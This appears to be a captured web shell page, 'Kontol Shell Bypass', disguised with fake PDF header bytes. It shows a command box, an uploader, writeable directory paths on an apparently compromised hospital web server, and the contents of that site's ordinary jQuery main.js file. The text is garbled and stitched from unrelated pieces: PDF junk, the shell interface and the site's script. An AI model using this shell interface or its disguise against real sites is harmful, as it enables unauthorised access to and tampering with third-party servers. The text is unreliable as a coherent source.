%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/international/generic/js/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/international/generic/js/main.js
//scroll-smooth-menu-button-css
$("a.shardahighlightbtn").click(function(){
$('html, body').animate({
scrollTop: $('#key_h').offset().top
},1000);
});
$("a.applybtn").click(function(){
$('html, body').animate({
scrollTop: $('#how_to_apply').offset().top
},1000);
});

$("a.placementbtn").click(function(){
$('html, body').animate({
scrollTop: $('#toptab').offset().top
},1000);
});

$("a.headerrtop").click(function(){
$('html, body').animate({
scrollTop: $('footer').offset().top
},1000);
});

$("a.glob").click(function(){
$('html, body').animate({
scrollTop: $('#tab_new').offset().top
},1000);
});

$("a.app").click(function(){
$('html, body').animate({
scrollTop: $('#home_slider').offset().top
},1000);
});



//***********************************
$(document).ready(function($){
var offset = 1500,
offset_opacity = 1200,
scroll_top_duration = 700,
$back_to_top = $('.cd-top');
$(window).scroll(function(){
( $(this).scrollTop() > offset ) ? $back_to_top.addClass('cd-is-visible') : $back_to_top.removeClass('cd-is-visible cd-fade-out');
if( $(this).scrollTop() > offset_opacity ) { 
$back_to_top.addClass('cd-fade-out');
}
});

$back_to_top.on('click', function(event){
event.preventDefault();
$('body,html').animate({
scrollTop: 0 ,
}, scroll_top_duration
);
});
//**********************************************
});


$(window).load(function() {
$("#flexiselDemo1").flexisel();
$("#flexiselDemo2").flexisel({
        visibleItems: 4,
        itemsToScroll: 1,
        animationSpeed: 100,
        infinite: true,
        navigationTargetSelector: null,
        autoPlay: {
            enable: false,
            interval: 5000,
            pauseOnHover: true
        },
        responsiveBreakpoints: { 
            portrait: { 
                changePoint:480,
                visibleItems: 1,
                itemsToScroll: 1
            }, 
            landscape: { 
                changePoint:640,
                visibleItems: 1,
                itemsToScroll: 2
            },
            tablet: { 
                changePoint:768,
                visibleItems: 3,
                itemsToScroll: 3
            }
        },
        loaded: function(object) {
            console.log('Slider loaded...');
        },
        before: function(object){
            console.log('Before transition...');
        },
        after: function(object) {
            console.log('After transition...');
        }
    });

$("#flexiselDemo3").flexisel({
        visibleItems: 5,
        itemsToScroll: 1,
        animationSpeed: 100,
        infinite: true,
        navigationTargetSelector: null,
        autoPlay: {
            enable: false,
            interval: 5000,
            pauseOnHover: true
        },
        responsiveBreakpoints: { 
            portrait: { 
                changePoint:480,
                visibleItems: 2,
                itemsToScroll: 2
            }, 
            landscape: { 
                changePoint:640,
                visibleItems: 2,
                itemsToScroll: 2
            },
            tablet: { 
                changePoint:768,
                visibleItems: 3,
                itemsToScroll: 3
            }
        },
        loaded: function(object) {
            console.log('Slider loaded...');
        },
        before: function(object){
            console.log('Before transition...');
        },
        after: function(object) {
            console.log('After transition...');
        }
    });

$("#flexiselDemo4").flexisel({
        visibleItems: 4,
        itemsToScroll: 1,
        animationSpeed: 100,
        infinite: true,
        navigationTargetSelector: null,
        autoPlay: {
            enable: false,
            interval: 5000,
            pauseOnHover: true
        },
        responsiveBreakpoints: { 
            portrait: { 
                changePoint:480,
                visibleItems: 1,
                itemsToScroll: 1
            }, 
            landscape: { 
                changePoint:640,
                visibleItems: 2,
                itemsToScroll: 2
            },
            tablet: { 
                changePoint:768,
                visibleItems: 3,
                itemsToScroll: 3
            }
        },
        loaded: function(object) {
            console.log('Slider loaded...');
        },
        before: function(object){
            console.log('Before transition...');
        },
        after: function(object) {
            console.log('After transition...');
        }
    });
	
 $("#flexiselDemo6").flexisel({
        visibleItems: 1,
        itemsToScroll: 1,
        animationSpeed: 100,
        infinite: true,
        navigationTargetSelector: null,

        autoPlay: {
            enable: false,
            interval: 5000,
            pauseOnHover: true
        },

        responsiveBreakpoints: { 
            portrait: { 
                changePoint:480,
                visibleItems: 1,
                itemsToScroll: 1
            }, 

            landscape: { 
                changePoint:640,
                visibleItems: 1,
                itemsToScroll: 1
            },

            tablet: { 
                changePoint:768,
                visibleItems: 3,
                itemsToScroll: 3
            }

        },

        loaded: function(object) {
            console.log('Slider loaded...');
        },

        before: function(object){
            console.log('Before transition...');
        },

        after: function(object) {
            console.log('After transition...');
        }
    });
	

 $("#flexiselDemo7").flexisel({
        visibleItems: 1,
        itemsToScroll: 1,
        animationSpeed: 100,
        infinite: true,
        navigationTargetSelector: null,

        autoPlay: {
            enable: false,
            interval: 5000,
            pauseOnHover: true
        },

        responsiveBreakpoints: { 
            portrait: { 
                changePoint:480,
                visibleItems: 1,
                itemsToScroll: 1
            }, 

            landscape: { 
                changePoint:640,
                visibleItems: 1,
                itemsToScroll: 2
            },

            tablet: { 
                changePoint:768,
                visibleItems: 3,
                itemsToScroll: 3
            }
        },

        loaded: function(object) {
            console.log('Slider loaded...');
        },

        before: function(object){
            console.log('Before transition...');
        },

        after: function(object) {
            console.log('After transition...');
        }

    });	
		
    

});


$("#navItem1").on('click', function(){
		$('#content-wrap1').hide();
		$('#content-wrap2').hide();
		$('#content-wrap3').hide();
		$('#content-wrap4').hide();
		$('#content-wrap5').hide();
		$('#content-wrap1').fadeIn(1000);
	});
	$("#navItem2").on('click', function(){
		$('#content-wrap1').hide();
		$('#content-wrap2').hide();
		$('#content-wrap3').hide();
		$('#content-wrap4').hide();
		$('#content-wrap5').hide();
		$('#content-wrap2').fadeIn(1000);
	});
	$("#navItem3").on('click', function(){
		$('#content-wrap1').hide();
		$('#content-wrap2').hide();
		$('#content-wrap3').hide();
		$('#content-wrap4').hide();
		$('#content-wrap5').hide();
		$('#content-wrap3').fadeIn(1000);
	});
	$("#navItem4").on('click', function(){
		$('#content-wrap1').hide();
		$('#content-wrap2').hide();
		$('#content-wrap3').hide();
		$('#content-wrap4').hide();
		$('#content-wrap5').hide();
		$('#content-wrap4').fadeIn(1000);
	});
	$("#navItem5").on('click', function(){
		$('#content-wrap1').hide();
		$('#content-wrap2').hide();
		$('#content-wrap3').hide();
		$('#content-wrap4').hide();
        $('#content-wrap5').hide();
		$('#content-wrap5').fadeIn(1000);
	});
	
	
	function fadeInFirstContent(){
		$('#content-wrap3').fadeIn(1000);
	
	}
	fadeInFirstContent();	
	
//ApplyBeforeJS	
$(document).ready(function(){
			 setTimeout(function(){$("#spopup").show("slow"); }, 2000);
});

$(window).scroll(function(){
	if($(document).scrollTop()>=1)
		$("#spopup").hide("slow");
		else 
		{
			 $("#spopup").show("slow");
			
			
		}
});
function closeSPopup(){
	$('#spopup').hide('slow');
}
$("#slideshow > div:gt(0)").hide();

setInterval(function() { 
  $('#slideshow > div:first')
    .fadeOut(1000)
    .next()
    .fadeIn(1000)
    .end()
    .appendTo('#slideshow');
},  80000);	
//ApplyBeforeJS	

//toptabjs
$(document).ready(function () {
$('#horizontalTab').easyResponsiveTabs({
type: 'default', //Types: default, vertical, accordion           
width: 'auto', //auto or any width like 600px
fit: true,   // 100% fit in a container
closed: 'accordion', // Start closed if in accordion view
activate: function(event) { // Callback function if tab is switched
var $tab = $(this);
var $info = $('#tabInfo');
var $name = $('span', $info);
$name.text($tab.text());
$info.show();
}
});
$('#verticalTab').easyResponsiveTabs({
type: 'vertical',
width: 'auto',
fit: true
});
});
//toptabjsend

//tabjs
$(document).ready(function () {
$('#horizontalTab2').easyResponsiveTabs({
type: 'default', //Types: default, vertical, accordion           
width: 'auto', //auto or any width like 600px
fit: true,   // 100% fit in a container
closed: 'accordion', // Start closed if in accordion view
activate: function(event) { // Callback function if tab is switched
var $tab = $(this);
var $info = $('#tabInfo');
var $name = $('span', $info);
$name.text($tab.text());
$info.show();
}
});
$('#verticalTab').easyResponsiveTabs({
type: 'vertical',
width: 'auto',
fit: true
});
});
//tabjsend

Kontol Shell Bypass